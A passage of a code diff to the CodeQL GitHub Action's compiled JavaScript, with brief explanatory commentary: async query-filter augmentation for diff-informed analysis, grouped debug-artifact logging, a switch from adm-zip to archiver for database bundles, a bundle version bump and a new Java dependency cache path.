     sinon.stub(io, "which").resolves("");
     process.env["CODEQL_ACTION_EXTRA_OPTIONS"] =
         '{ "database": { "init": ["--overwrite"] } }';
-    await codeqlObject.databaseInitCluster(stubConfig, "sourceRoot", undefined, undefined, (0, logging_1.getRunnerLogger)(false));
+    await codeqlObject.databaseInitCluster(stubConfig, "sourceRoot", undefined, undefined, overlay_database_utils_1.OverlayDatabaseMode.None, (0, logging_1.getRunnerLogger)(false));
     t.true(runnerConstructorStub.calledOnce);
     const args = runnerConstructorStub.firstCall.args[1];
     t.is(args.filter((option) => option === "--overwrite").length, 1, "--overwrite should only be passed once");
File diff suppressed because one or more lines are too long
16  lib/config-utils.js  generated
@@ -64,6 +64,7 @@ const yaml = __importStar(require("js-yaml"));
 const semver = __importStar(require("semver"));
 const api = __importStar(require("./api-client"));
 const caching_utils_1 = require("./caching-utils");
+const diff_informed_analysis_utils_1 = require("./diff-informed-analysis-utils");
 const feature_flags_1 = require("./feature-flags");
 const languages_1 = require("./languages");
 const trap_caching_1 = require("./trap-caching");
@@ -79,6 +80,7 @@ exports.defaultAugmentationProperties = {
     packsInputCombines: false,
     packsInput: undefined,
     queriesInput: undefined,
+    defaultQueryFilters: [],
 };
 function getPacksStrInvalid(packStr, configFile) {
     return configFile
@@ -227,7 +229,7 @@ async function getRawLanguages(languagesInput, repository, logger) {
 async function getDefaultConfig({ languagesInput, queriesInput, packsInput, buildModeInput, dbLocation, trapCachingEnabled, dependencyCachingEnabled, debugMode, debugArtifactName, debugDatabaseName, repository, tempDir, codeql, githubVersion, features, logger, }) {
     const languages = await getLanguages(codeql, languagesInput, repository, logger);
     const buildMode = await parseBuildModeInput(buildModeInput, languages, features, logger);
-    const augmentationProperties = calculateAugmentation(packsInput, queriesInput, languages);
+    const augmentationProperties = await calculateAugmentation(codeql, features, packsInput, queriesInput, languages, logger);
     const { trapCaches, trapCacheDownloadTime } = await downloadCacheWithTime(trapCachingEnabled, codeql, languages, logger);
     return {
         languages,
@@ -277,7 +279,7 @@ async function loadConfig({ languagesInput, queriesInput, packsInput, buildModeI
     }
     const languages = await getLanguages(codeql, languagesInput, repository, logger);
     const buildMode = await parseBuildModeInput(buildModeInput, languages, features, logger);
-    const augmentationProperties = calculateAugmentation(packsInput, queriesInput, languages);
+    const augmentationProperties = await calculateAugmentation(codeql, features, packsInput, queriesInput, languages, logger);
     const { trapCaches, trapCacheDownloadTime } = await downloadCacheWithTime(trapCachingEnabled, codeql, languages, logger);
     return {
         languages,
@@ -303,11 +305,14 @@ async function loadConfig({ languagesInput, queriesInput, packsInput, buildModeI
  * and the CLI does not know about these inputs so we need to inject them into
  * the config file sent to the CLI.
  *
+ * @param codeql The CodeQL object.
+ * @param features The feature enablement object.
  * @param rawPacksInput The packs input from the action configuration.
  * @param rawQueriesInput The queries input from the action configuration.
  * @param languages The languages that the config file is for. If the packs input
  * is non-empty, then there must be exactly one language. Otherwise, an
  * error is thrown.
+ * @param logger The logger to use for logging.
  *
  * @returns The properties that need to be augmented in the config file.
  *
@@ -315,16 +320,21 @@ async function loadConfig({ languagesInput, queriesInput, packsInput, buildModeI
  * not have exactly one language.
  */
 // exported for testing.
-function calculateAugmentation(rawPacksInput, rawQueriesInput, languages) {
+async function calculateAugmentation(codeql, features, rawPacksInput, rawQueriesInput, languages, logger) {
     const packsInputCombines = shouldCombine(rawPacksInput);
     const packsInput = parsePacksFromInput(rawPacksInput, languages, packsInputCombines);
     const queriesInputCombines = shouldCombine(rawQueriesInput);
     const queriesInput = parseQueriesFromInput(rawQueriesInput, queriesInputCombines);
+    const defaultQueryFilters = [];
+    if (await (0, diff_informed_analysis_utils_1.shouldPerformDiffInformedAnalysis)(codeql, features, logger)) {
+        defaultQueryFilters.push({ exclude: { tags: "exclude-from-incremental" } });
+    }
     return {
         packsInputCombines,
         packsInput: packsInput?.[languages[0]],
         queriesInput,
         queriesInputCombines,
+        defaultQueryFilters,
     };
 }
 function parseQueriesFromInput(rawQueriesInput, queriesInputCombines) {
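
calculateAugmentation is now async and takes the CodeQL object, the feature enablement state, and a logger so it can decide whether the diff-informed default filter applies. Illustratively, a call on a pull-request run with the feature enabled would look like this (the argument values here are assumed, not taken from a real run):

// Updated call shape; everything beyond the original three arguments is new.
const augmentationProperties = await calculateAugmentation(codeql, features, undefined, undefined, [Language.javascript], logger);
// => {
//      packsInputCombines: false,
//      packsInput: undefined,
//      queriesInput: undefined,
//      queriesInputCombines: false,
//      defaultQueryFilters: [{ exclude: { tags: "exclude-from-incremental" } }],
//    }
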
File diff suppressed because one or more lines are too long
9  lib/config-utils.test.js  generated
@@ -624,7 +624,7 @@ const packSpecPrettyPrintingMacro = ava_1.default.macro({
 const mockLogger = (0, logging_1.getRunnerLogger)(true);
 const calculateAugmentationMacro = ava_1.default.macro({
     exec: async (t, _title, rawPacksInput, rawQueriesInput, languages, expectedAugmentationProperties) => {
-        const actualAugmentationProperties = configUtils.calculateAugmentation(rawPacksInput, rawQueriesInput, languages);
+        const actualAugmentationProperties = await configUtils.calculateAugmentation((0, codeql_1.getCachedCodeQL)(), (0, testing_utils_1.createFeatures)([]), rawPacksInput, rawQueriesInput, languages, mockLogger);
         t.deepEqual(actualAugmentationProperties, expectedAugmentationProperties);
     },
     title: (_, title) => `Calculate Augmentation: ${title}`,
@@ -634,34 +634,39 @@ const calculateAugmentationMacro = ava_1.default.macro({
     queriesInput: undefined,
     packsInputCombines: false,
     packsInput: undefined,
+    defaultQueryFilters: [],
 });
 (0, ava_1.default)(calculateAugmentationMacro, "With queries", undefined, " a, b , c, d", [languages_1.Language.javascript], {
     queriesInputCombines: false,
     queriesInput: [{ uses: "a" }, { uses: "b" }, { uses: "c" }, { uses: "d" }],
     packsInputCombines: false,
     packsInput: undefined,
+    defaultQueryFilters: [],
 });
 (0, ava_1.default)(calculateAugmentationMacro, "With queries combining", undefined, " + a, b , c, d ", [languages_1.Language.javascript], {
     queriesInputCombines: true,
     queriesInput: [{ uses: "a" }, { uses: "b" }, { uses: "c" }, { uses: "d" }],
     packsInputCombines: false,
     packsInput: undefined,
+    defaultQueryFilters: [],
 });
 (0, ava_1.default)(calculateAugmentationMacro, "With packs", " codeql/a , codeql/b , codeql/c , codeql/d ", undefined, [languages_1.Language.javascript], {
     queriesInputCombines: false,
     queriesInput: undefined,
     packsInputCombines: false,
     packsInput: ["codeql/a", "codeql/b", "codeql/c", "codeql/d"],
+    defaultQueryFilters: [],
 });
 (0, ava_1.default)(calculateAugmentationMacro, "With packs combining", " + codeql/a, codeql/b, codeql/c, codeql/d", undefined, [languages_1.Language.javascript], {
     queriesInputCombines: false,
     queriesInput: undefined,
     packsInputCombines: true,
     packsInput: ["codeql/a", "codeql/b", "codeql/c", "codeql/d"],
+    defaultQueryFilters: [],
 });
 const calculateAugmentationErrorMacro = ava_1.default.macro({
     exec: async (t, _title, rawPacksInput, rawQueriesInput, languages, expectedError) => {
-        t.throws(() => configUtils.calculateAugmentation(rawPacksInput, rawQueriesInput, languages), { message: expectedError });
+        await t.throwsAsync(() => configUtils.calculateAugmentation((0, codeql_1.getCachedCodeQL)(), (0, testing_utils_1.createFeatures)([]), rawPacksInput, rawQueriesInput, languages, mockLogger), { message: expectedError });
     },
     title: (_, title) => `Calculate Augmentation Error: ${title}`,
 });
File diff suppressed because one or more lines are too long
57  lib/debug-artifacts.js  generated
@@ -46,7 +46,7 @@ const path = __importStar(require("path"));
 const artifact = __importStar(require("@actions/artifact"));
 const artifactLegacy = __importStar(require("@actions/artifact-legacy"));
 const core = __importStar(require("@actions/core"));
-const adm_zip_1 = __importDefault(require("adm-zip"));
+const archiver_1 = __importDefault(require("archiver"));
 const del_1 = __importDefault(require("del"));
 const actions_util_1 = require("./actions-util");
 const analyze_1 = require("./analyze");
@@ -66,26 +66,28 @@ async function uploadCombinedSarifArtifacts(logger, gitHubVariant, codeQlVersion
     const tempDir = (0, actions_util_1.getTemporaryDirectory)();
     // Upload Actions SARIF artifacts for debugging when environment variable is set
     if (process.env["CODEQL_ACTION_DEBUG_COMBINED_SARIF"] === "true") {
-        logger.info("Uploading available combined SARIF files as Actions debugging artifact...");
-        const baseTempDir = path.resolve(tempDir, "combined-sarif");
-        const toUpload = [];
-        if (fs.existsSync(baseTempDir)) {
-            const outputDirs = fs.readdirSync(baseTempDir);
-            for (const outputDir of outputDirs) {
-                const sarifFiles = fs
-                    .readdirSync(path.resolve(baseTempDir, outputDir))
-                    .filter((f) => f.endsWith(".sarif"));
-                for (const sarifFile of sarifFiles) {
-                    toUpload.push(path.resolve(baseTempDir, outputDir, sarifFile));
-                }
-            }
-        }
-        try {
-            await uploadDebugArtifacts(logger, toUpload, baseTempDir, "combined-sarif-artifacts", gitHubVariant, codeQlVersion);
-        }
-        catch (e) {
-            logger.warning(`Failed to upload combined SARIF files as Actions debugging artifact. Reason: ${(0, util_1.getErrorMessage)(e)}`);
-        }
+        await (0, logging_1.withGroup)("Uploading combined SARIF debug artifact", async () => {
+            logger.info("Uploading available combined SARIF files as Actions debugging artifact...");
+            const baseTempDir = path.resolve(tempDir, "combined-sarif");
+            const toUpload = [];
+            if (fs.existsSync(baseTempDir)) {
+                const outputDirs = fs.readdirSync(baseTempDir);
+                for (const outputDir of outputDirs) {
+                    const sarifFiles = fs
+                        .readdirSync(path.resolve(baseTempDir, outputDir))
+                        .filter((f) => f.endsWith(".sarif"));
+                    for (const sarifFile of sarifFiles) {
+                        toUpload.push(path.resolve(baseTempDir, outputDir, sarifFile));
+                    }
+                }
+            }
+            try {
+                await uploadDebugArtifacts(logger, toUpload, baseTempDir, "combined-sarif-artifacts", gitHubVariant, codeQlVersion);
+            }
+            catch (e) {
+                logger.warning(`Failed to upload combined SARIF files as Actions debugging artifact. Reason: ${(0, util_1.getErrorMessage)(e)}`);
+            }
+        });
     }
 }
 /**
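
The SARIF-upload block is now wrapped in withGroup, which renders the enclosed log lines as a collapsible group in the Actions log. A plausible shape for such a helper, assuming @actions/core's startGroup/endGroup (the actual implementation lives in ./logging and may differ):

const core = require("@actions/core");

// Sketch: run body inside a collapsible log group, always closing the group.
async function withGroup(name, body) {
    core.startGroup(name);
    try {
        return await body();
    }
    finally {
        core.endGroup();
    }
}
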
@@ -248,9 +250,20 @@ async function createPartialDatabaseBundle(config, language) {
     if (fs.existsSync(databaseBundlePath)) {
         await (0, del_1.default)(databaseBundlePath, { force: true });
     }
-    const zip = new adm_zip_1.default();
-    zip.addLocalFolder(databasePath);
-    zip.writeZip(databaseBundlePath);
+    const output = fs.createWriteStream(databaseBundlePath);
+    const zip = (0, archiver_1.default)("zip");
+    zip.on("error", (err) => {
+        throw err;
+    });
+    zip.on("warning", (err) => {
+        // Ignore ENOENT warnings. There's nothing anyone can do about it.
+        if (err.code !== "ENOENT") {
+            throw err;
+        }
+    });
+    zip.pipe(output);
+    zip.directory(databasePath, false);
+    await zip.finalize();
     return databaseBundlePath;
 }
 /**
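
The bundling switch from adm-zip to archiver trades an in-memory zip (addLocalFolder plus writeZip) for a streaming one: entries are piped to a write stream as they are compressed, which keeps memory flat for large databases. One subtlety: finalize() resolves once the archive data has been handed to the stream, so callers that must be certain the file handle is closed can additionally wait for the output stream's "close" event. A hedged sketch of that stricter variant (the code above awaits finalize() only):

const fs = require("fs");
const archiver = require("archiver");

// Sketch: streaming zip that also waits for the file handle to close.
async function zipDirectory(sourceDir, destPath) {
    const output = fs.createWriteStream(destPath);
    const zip = archiver("zip");
    const closed = new Promise((resolve, reject) => {
        output.on("close", resolve);
        zip.on("error", reject);
    });
    zip.pipe(output);
    zip.directory(sourceDir, false); // false: do not prefix entries with the dir name
    await zip.finalize();
    await closed;
    return destPath;
}
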
File diff suppressed because one or more lines are too long
@@ -1,6 +1,6 @@
 {
-    "bundleVersion": "codeql-bundle-v2.20.3",
-    "cliVersion": "2.20.3",
-    "priorBundleVersion": "codeql-bundle-v2.20.2",
-    "priorCliVersion": "2.20.2"
+    "bundleVersion": "codeql-bundle-v2.21.1",
+    "cliVersion": "2.21.1",
+    "priorBundleVersion": "codeql-bundle-v2.21.0",
+    "priorCliVersion": "2.21.0"
 }
12  lib/dependency-caching.js  generated
@@ -33,17 +33,27 @@ var __importStar = (this && this.__importStar) || (function () {
     };
 })();
 Object.defineProperty(exports, "__esModule", { value: true });
+exports.getJavaTempDependencyDir = getJavaTempDependencyDir;
 exports.downloadDependencyCaches = downloadDependencyCaches;
 exports.uploadDependencyCaches = uploadDependencyCaches;
 const os = __importStar(require("os"));
 const path_1 = require("path");
 const actionsCache = __importStar(require("@actions/cache"));
 const glob = __importStar(require("@actions/glob"));
+const actions_util_1 = require("./actions-util");
 const caching_utils_1 = require("./caching-utils");
 const environment_1 = require("./environment");
 const util_1 = require("./util");
 const CODEQL_DEPENDENCY_CACHE_PREFIX = "codeql-dependencies";
 const CODEQL_DEPENDENCY_CACHE_VERSION = 1;
+/**
+ * Returns a path to a directory intended to be used to store .jar files
+ * for the Java `build-mode: none` extractor.
+ * @returns The path to the directory that should be used by the `build-mode: none` extractor.
+ */
+function getJavaTempDependencyDir() {
+    return (0, path_1.join)((0, actions_util_1.getTemporaryDirectory)(), "codeql_java", "repository");
+}
 /**
  * Default caching configurations per language.
  */
@@ -54,6 +64,8 @@ const CODEQL_DEFAULT_CACHE_CONFIG = {
         (0, path_1.join)(os.homedir(), ".m2", "repository"),
         // Gradle
         (0, path_1.join)(os.homedir(), ".gradle", "caches"),
+        // CodeQL Java build-mode: none
+        getJavaTempDependencyDir(),
     ],
     hash: [
         // Maven
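
getJavaTempDependencyDir anchors the .jar download location for build-mode: none inside the runner's temporary directory, and adding it to the Java paths list means those jars now participate in dependency-cache save and restore. Illustratively, assuming getTemporaryDirectory() resolves to RUNNER_TEMP (as on hosted runners unless overridden):

const { join } = require("path");

// Sketch: where the build-mode: none jars land under the assumption above.
const javaTempDependencyDir = join(process.env.RUNNER_TEMP ?? "/tmp", "codeql_java", "repository");
// e.g. /home/runner/work/_temp/codeql_java/repository on a hosted Linux runner
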
@@ -1 +1 @@
{"version":3,"file":"dependency-caching.js","sourceRoot":"","sources":["../src/dependency-caching.ts"],"names":[],"mappings":"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"}
{"version":3,"file":"dependency-caching.js","sourceRoot":"","sources":["../src/dependency-caching.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAoCA,4DAEC;AAqDD,4DAmDC;AAQD,wDAiEC;AAvND,uCAAyB;AACzB,+BAA4B;AAE5B,6DAA+C;AAC/C,oDAAsC;AAEtC,iDAAuD;AACvD,mDAAoD;AAEpD,+CAAuC;AAGvC,iCAA6C;AAgB7C,MAAM,8BAA8B,GAAG,qBAAqB,CAAC;AAC7D,MAAM,+BAA+B,GAAG,CAAC,CAAC;AAE1C;;;;GAIG;AACH,SAAgB,wBAAwB;IACtC,OAAO,IAAA,WAAI,EAAC,IAAA,oCAAqB,GAAE,EAAE,aAAa,EAAE,YAAY,CAAC,CAAC;AACpE,CAAC;AAED;;GAEG;AACH,MAAM,2BAA2B,GAAwC;IACvE,IAAI,EAAE;QACJ,KAAK,EAAE;YACL,QAAQ;YACR,IAAA,WAAI,EAAC,EAAE,CAAC,OAAO,EAAE,EAAE,KAAK,EAAE,YAAY,CAAC;YACvC,SAAS;YACT,IAAA,WAAI,EAAC,EAAE,CAAC,OAAO,EAAE,EAAE,SAAS,EAAE,QAAQ,CAAC;YACvC,+BAA+B;YAC/B,wBAAwB,EAAE;SAC3B;QACD,IAAI,EAAE;YACJ,QAAQ;YACR,YAAY;YACZ,SAAS;YACT,cAAc;YACd,8BAA8B;YAC9B,yBAAyB;YACzB,6BAA6B;YAC7B,wBAAwB;YACxB,wBAAwB;SACzB;KACF;IACD,MAAM,EAAE;QACN,KAAK,EAAE,CAAC,IAAA,WAAI,EAAC,EAAE,CAAC,OAAO,EAAE,EAAE,QAAQ,EAAE,UAAU,CAAC,CAAC;QACjD,IAAI,EAAE;YACJ,QAAQ;YACR,uBAAuB;YACvB,QAAQ;YACR,eAAe;SAChB;KACF;IACD,EAAE,EAAE;QACF,KAAK,EAAE,CAAC,IAAA,WAAI,EAAC,EAAE,CAAC,OAAO,EAAE,EAAE,IAAI,EAAE,KAAK,EAAE,KAAK,CAAC,CAAC;QAC/C,IAAI,EAAE,CAAC,WAAW,CAAC;KACpB;CACF,CAAC;AAEF,KAAK,UAAU,WAAW,CAAC,QAAkB;IAC3C,OAAO,IAAI,CAAC,MAAM,CAAC,QAAQ,CAAC,IAAI,CAAC,IAAI,CAAC,CAAC,CAAC;AAC1C,CAAC;AAED;;;;;;GAMG;AACI,KAAK,UAAU,wBAAwB,CAC5C,SAAqB,EACrB,MAAc;IAEd,MAAM,cAAc,GAAe,EAAE,CAAC;IAEtC,KAAK,MAAM,QAAQ,IAAI,SAAS,EAAE,CAAC;QACjC,MAAM,WAAW,GAAG,2BAA2B,CAAC,QAAQ,CAAC,CAAC;QAE1D,IAAI,WAAW,KAAK,SAAS,EAAE,CAAC;YAC9B,MAAM,CAAC,IAAI,CACT,6CAA6C,QAAQ,8CAA8C,CACpG,CAAC;YACF,SAAS;QACX,CAAC;QAED,gGAAgG;QAChG,wBAAwB;QACxB,MAAM,OAAO,GAAG,MAAM,WAAW,CAAC,WAAW,CAAC,IAAI,CAAC,CAAC;QAEpD,IAAI,CAAC,MAAM,OAAO,CAAC,IAAI,EAAE,CAAC,CAAC,MAAM,KAAK,CAAC,EAAE,CAAC;YACxC,MAAM,CAAC,IAAI,CACT,6CAA6C,QAAQ,mDAAmD,CACzG,CAAC;YACF,SAAS;QACX,CAAC;QAED,MAAM,UAAU,GAAG,MAAM,QAAQ,CAAC,QAAQ,EAAE,WAAW,CAAC,CAAC;QACzD,MAAM,WAAW,GAAa,CAAC,MAAM,WAAW,CAAC,QAAQ,CAAC,CAAC,CAAC;QAE5D,MAAM,CAAC,IAAI,CACT,yBAAyB,QAAQ,aAAa,UAAU,qBAAqB,WAAW,CAAC,IAAI,CAC3F,IAAI,CACL,EAAE,CACJ,CAAC;QAEF,MAAM,MAAM,GAAG,MAAM,YAAY,CAAC,YAAY,CAC5C,WAAW,CAAC,KAAK,EACjB,UAAU,EACV,WAAW,CACZ,CAAC;QAEF,IAAI,MAAM,KAAK,SAAS,EAAE,CAAC;YACzB,MAAM,CAAC,IAAI,CAAC,oBAAoB,MAAM,QAAQ,QAAQ,GAAG,CAAC,CAAC;YAC3D,cAAc,CAAC,IAAI,CAAC,QAAQ,CAAC,CAAC;QAChC,CAAC;aAAM,CAAC;YACN,MAAM,CAAC,IAAI,CAAC,+BAA+B,QAAQ,GAAG,CAAC,CAAC;QAC1D,CAAC;IACH,CAAC;IAED,OAAO,cAAc,CAAC;AACxB,CAAC;AAED;;;;;GAKG;AACI,KAAK,UAAU,sBAAsB,CAAC,MAAc,EAAE,MAAc;IACzE,KAAK,MAAM,QAAQ,IAAI,MAAM,CAAC,SAAS,EAAE,CAAC;QACxC,MAAM,WAAW,GAAG,2BAA2B,CAAC,QAAQ,CAAC,CAAC;QAE1D,IAAI,WAAW,KAAK,SAAS,EAAE,CAAC;YAC9B,MAAM,CAAC,IAAI,CACT,2CAA2C,QAAQ,8CAA8C,CAClG,CAAC;YACF,SAAS;QACX,CAAC;QAED,gGAAgG;QAChG,wBAAwB;QACxB,MAAM,OAAO,GAAG,MAAM,WAAW,CAAC,WAAW,CAAC,IAAI,CAAC,CAAC;QAEpD,IAAI,CAAC,MAAM,OAAO,CAAC,IAAI,EAAE,CAAC,CAAC,MAAM,KAAK,CAAC,EAAE,CAAC;YACxC,MAAM,CAAC,IAAI,CACT,2CAA2C,QAAQ,mDAAmD,CACvG,CAAC;YACF,SAAS;QACX,CAAC;QAED,yGAAyG;QACzG,uGAAuG;QACvG,uCAAuC;QACvC,uGAAuG;QACvG,uGAAuG;QACvG,sCAAsC;QACtC,uGAAuG;QACvG,sGAAsG;QACtG,sGAAsG;QACtG,4CAA4C;QAC5C,MAAM,IAAI,GAAG,MAAM,IAAA,iCAAiB,EAAC,WAAW,CAAC,KAAK,EAAE,MAAM,EAAE,IAAI,CAAC,CAAC;QAEtE,iCAAiC;QACjC,IAAI,IAAI,KAAK,CAAC,EAAE,CAAC;YACf,MAAM,CAAC,IAAI,CACT,2CAA2C,QAAQ,qBAAqB,CACzE,CAAC;YACF,SAAS;QACX,CAAC;QAED,MAAM,GAAG,GAAG,MAAM,QAAQ,CAAC,QAAQ,EAAE,WAAW,CAAC,CAAC;QAElD,MAAM,CAAC,IAAI,CACT,2BAA2B,IAAI,QAAQ,QAAQ,aAAa,GAAG,KAAK,CACrE,CAAC;QAEF,IAAI,CAAC;YACH,MAAM,YAAY,CAAC,SAAS,CAAC,WAAW,CAAC,KAAK,EAAE,GAAG,CAAC,CAAC;QACvD,CAAC;QAAC,OAAO,KAAK,EAAE,CAAC;YACf,yFAAyF;YACzF,uFAAuF;YACvF,gCAAgC;YACh
